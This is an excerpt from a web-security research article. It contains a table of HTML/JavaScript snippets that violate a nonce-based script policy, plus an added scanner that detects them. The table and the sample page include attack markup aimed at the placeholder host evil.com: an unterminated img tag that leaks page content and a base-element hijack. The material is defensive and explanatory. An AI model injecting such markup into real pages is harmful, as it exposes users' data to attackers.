Research Article
A Protection Mechanism against Malicious HTML and JavaScript Code in Vulnerable Web Applications
Table 2. The code violating the policy in Example 2.

| The code violating the policy | Reason | Policy |
|---|---|---|
| `<script>malicious script</script>` | Missing the nonce attribute | (i) |
| `<script nonce="dDNnf03nceIOfn39">malicious script</script>` | An incorrect nonce attribute value | (i) |
| `<script nonce="z0h3sdfaEDNnf03n" id="example"> alert(document.getElementById("example").getAttribute("nonce")); </script>` | The nonce attribute cannot be obtained or set by JavaScript code | (ii) |
| `<a href = "javascript:malicious script"> example</a>` `<a href = "#" onclick="malicious script">example</a>` | The javascript: protocol URL and the onclick attribute are disabled | (iii) |
| `<img src =http://evil.com/log.cgi?` `<base href = http://evil.com/>` `<form action = update_profile.php> <input type = hidden id=share_with value=fred> <input id = share_with value=bogo> </form>` | An incorrect src attribute value; a base element outside the head element; two input elements with the same id attribute value are both invalid | (vi) |
| `<script nonce="z0h3sdfaEDNnf03n"> document.write("malicious html or script") </script>` | The call to the JavaScript method document.write is forbidden | (vii) |
| `<script nonce="z0h3sdfaEDNnf03n"> setTimeout("malicious script",1000) </script>` | The first parameter of setTimeout is a string | (viii) |
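The following is an added example, not code from the paper: a small static scanner that reports the kinds of violations Table 2 lists, the way a defender would run it over rendered server output in a test suite. It is a regex pass over the HTML string (no DOM) so it runs offline in Node; how each rule is detected, the expected nonce (taken from the table's value `z0h3sdfaEDNnf03n`), the `doSomething()` placeholder used in place of the table's "malicious script", and the constructed sample page are all this example's assumptions, not the paper's mechanism.

```javascript
// Added example (not from the paper): regex-based scanner for Table 2's policy rules.
// A real enforcement point sits in the browser's parser/CSP layer; this is a test-time check.

// Nonce the server embedded for this response (value taken from Table 2).
const EXPECTED_NONCE = "z0h3sdfaEDNnf03n";

// Parse the name=value pairs of one start tag into a map of lower-cased names.
function parseAttrs(tagBody) {
  const attrs = {};
  const re = /([^\s=\/"'<>]+)\s*(?:=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+)))?/g;
  let m;
  while ((m = re.exec(tagBody)) !== null) {
    attrs[m[1].toLowerCase()] = m[2] ?? m[3] ?? m[4] ?? "";
  }
  return attrs;
}

// Scan one HTML document; returns [{policy, reason, at}] using Table 2's rule numbers.
function scanHtml(html, expectedNonce = EXPECTED_NONCE) {
  const findings = [];
  const headStart = html.search(/<head\b/i);
  const headEnd = html.search(/<\/head>/i);
  const seenIds = new Set();

  // (vi) a start tag that runs into the next "<" never got its ">":
  // its last attribute value (e.g. an unquoted src) is malformed.
  for (const m of html.matchAll(/<[a-zA-Z][\w-]*\b[^<>]*(?=<)/g)) {
    findings.push({ policy: "vi", reason: "unterminated start tag / malformed attribute value", at: m.index });
  }

  const tagRe = /<([a-zA-Z][\w-]*)\b([^<>]*)>/g;
  let m;
  while ((m = tagRe.exec(html)) !== null) {
    const name = m[1].toLowerCase();
    const attrs = parseAttrs(m[2]);
    const at = m.index;

    if (name === "script") {
      // (i) every script must carry the nonce the server issued for this response
      if (!("nonce" in attrs)) {
        findings.push({ policy: "i", reason: "script missing nonce attribute", at });
      } else if (attrs.nonce !== expectedNonce) {
        findings.push({ policy: "i", reason: "script nonce does not match the server's nonce", at });
      }
      // Inspect the script body, then skip past it so markup inside string literals is not parsed as tags.
      const close = html.indexOf("</script>", tagRe.lastIndex);
      const body = close === -1 ? html.slice(tagRe.lastIndex) : html.slice(tagRe.lastIndex, close);
      // (ii) the nonce is not readable from script; flag code that tries to read it
      if (/getAttribute\s*\(\s*["']nonce["']\s*\)/.test(body)) {
        findings.push({ policy: "ii", reason: "script tries to read a nonce attribute", at });
      }
      // (vii) document.write / writeln inject unparsed markup
      if (/\bdocument\s*\.\s*write(ln)?\s*\(/.test(body)) {
        findings.push({ policy: "vii", reason: "call to document.write", at });
      }
      // (viii) a string first argument to setTimeout/setInterval is evaluated as code
      if (/\bset(Timeout|Interval)\s*\(\s*["'`]/.test(body)) {
        findings.push({ policy: "viii", reason: "setTimeout/setInterval called with a string", at });
      }
      if (close !== -1) tagRe.lastIndex = close;
    }

    // (iii) javascript: URLs and inline on* handlers are disabled
    for (const [k, v] of Object.entries(attrs)) {
      if (k.startsWith("on")) {
        findings.push({ policy: "iii", reason: `inline event handler ${k}`, at });
      } else if ((k === "href" || k === "src") && /^\s*javascript:/i.test(v)) {
        findings.push({ policy: "iii", reason: `javascript: URL in ${k}`, at });
      }
    }

    // (vi) base belongs only in head; id values must be unique
    const inHead = headStart !== -1 && at > headStart && (headEnd === -1 || at < headEnd);
    if (name === "base" && !inHead) {
      findings.push({ policy: "vi", reason: "base element outside head", at });
    }
    if ("id" in attrs) {
      if (seenIds.has(attrs.id)) {
        findings.push({ policy: "vi", reason: `duplicate id "${attrs.id}"`, at });
      }
      seenIds.add(attrs.id);
    }
  }
  return findings;
}

// Tally findings per policy rule, e.g. { i: 2, iii: 2, ... }.
function countByPolicy(findings) {
  return findings.reduce((acc, f) => ({ ...acc, [f.policy]: (acc[f.policy] || 0) + 1 }), {});
}

// Constructed sample page built from the Table 2 rows (script bodies replaced with a
// harmless doSomething() placeholder), plus one compliant script at the end.
const SAMPLE = [
  "<html><head><title>t</title></head><body>",
  "<script>doSomething()</script>",
  '<script nonce="dDNnf03nceIOfn39">doSomething()</script>',
  '<script nonce="z0h3sdfaEDNnf03n" id="example"> alert(document.getElementById("example").getAttribute("nonce")); </script>',
  '<a href = "javascript:doSomething()">example</a>',
  '<a href = "#" onclick="doSomething()">example</a>',
  "<img src =http://evil.com/log.cgi? <base href = http://evil.com/>",
  "<form action = update_profile.php><input type = hidden id=share_with value=fred>",
  "<input id = share_with value=bogo></form>",
  '<script nonce="z0h3sdfaEDNnf03n"> document.write("<b>x</b>") </script>',
  '<script nonce="z0h3sdfaEDNnf03n"> setTimeout("doSomething()",1000) </script>',
  '<script nonce="z0h3sdfaEDNnf03n">setTimeout(doSomething, 1000)</script>',
  "</body></html>",
].join("\n");

console.log(countByPolicy(scanHtml(SAMPLE)));
```

On the constructed sample the scanner reports ten findings: two under (i), one under (ii), two under (iii), three under (vi) (the unterminated img tag, the base element outside head, and the duplicate id), one under (vii) and one under (viii); the compliant script with a matching nonce and a function reference passed to setTimeout produces none. Because rule (ii) is enforced by the browser hiding the nonce from script, a static pass can only flag code that attempts to read it, which is what the check above does.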